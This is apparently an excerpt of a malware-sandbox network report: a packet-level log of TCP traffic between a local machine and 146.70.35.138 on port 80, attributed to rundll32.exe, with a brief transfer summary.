Apr 23, 2022 08:12:21.352133036 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352174997 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352294922 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352358103 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352400064 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352400064 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352446079 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352448940 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352488041 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352562904 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352577925 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353316069 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353373051 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353411913 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353462934 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353466988 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353501081 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353517056 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353553057 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353593111 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353605986 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353607893 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353663921 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353699923 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353701115 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353748083 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.353750944 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.353852987 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.391968012 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392033100 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392081022 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392147064 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392149925 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392163038 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392193079 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392196894 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392220020 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392251968 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392302990 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392306089 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392338037 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392354965 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392385960 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392421007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.392432928 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.392477036 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393404961 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393459082 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393479109 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393492937 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393498898 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393539906 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393591881 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393611908 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393649101 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393696070 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393742085 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393760920 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393779993 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393784046 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.393817902 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.393872976 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.432259083 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432308912 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432337046 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432369947 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432403088 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432425976 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432461023 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432496071 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432521105 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432539940 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.432554960 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432591915 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432615995 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432625055 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.432650089 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432677031 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.432684898 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.432745934 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.433655977 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433711052 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433742046 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433763027 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.433789968 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433840990 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433856964 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.433873892 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433921099 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433927059 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.433969021 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.433995008 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.433996916 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.434031963 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.434039116 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.434084892 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472415924 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472440958 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472454071 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472470045 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472482920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472563982 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472615004 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472786903 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472805977 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472816944 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472862959 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472902060 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472903013 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472915888 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.472954988 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.472971916 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473431110 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473449945 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473462105 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473478079 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473490000 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473510027 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473530054 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473704100 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473721981 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473733902 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473769903 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473771095 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473789930 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473798990 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473803043 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.473815918 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473844051 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.473989010 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.474005938 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.474019051 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.474049091 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.474066973 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.474081039 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.474133015 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.512749910 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.512794018 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.512830019 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.512856007 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.512880087 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.512937069 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.512996912 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513096094 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513139009 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513155937 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513175011 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513200045 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513200998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513227940 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513231039 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513273954 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513854027 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513892889 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513926983 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513951063 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.513952971 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.513984919 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514014006 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514019012 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514053106 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514054060 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514079094 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514095068 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514102936 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514113903 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514137983 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514153957 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514179945 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514192104 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514233112 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514255047 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514259100 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514281988 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.514286041 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.514329910 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.552782059 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552823067 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552843094 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552849054 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.552858114 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552877903 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552886009 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.552918911 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552926064 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.552941084 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552954912 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.552967072 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.552983999 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.553036928 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553097963 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.553647041 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553673983 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553689957 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.553694963 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553709984 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553714991 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.553735018 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.553957939 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553978920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.553999901 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554004908 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554022074 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554042101 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554054976 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554068089 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554116964 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554117918 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554158926 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554184914 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554200888 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554238081 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554255009 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554295063 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554346085 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554364920 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554385900 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554402113 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554406881 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554423094 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554447889 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.554476023 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.554514885 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.592963934 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593023062 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593064070 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593091011 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593116999 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593154907 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593172073 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593216896 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593266964 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593314886 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593337059 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593352079 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593352079 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593370914 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593399048 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593415976 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593465090 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.593961954 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.593986034 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594007969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594023943 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.594033957 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594048023 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.594067097 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49766 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe |

Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 23, 2022 08:12:19.910176992 CEST | 1224 | OUT | |
Apr 23, 2022 08:12:20.288152933 CEST | 1238 | IN |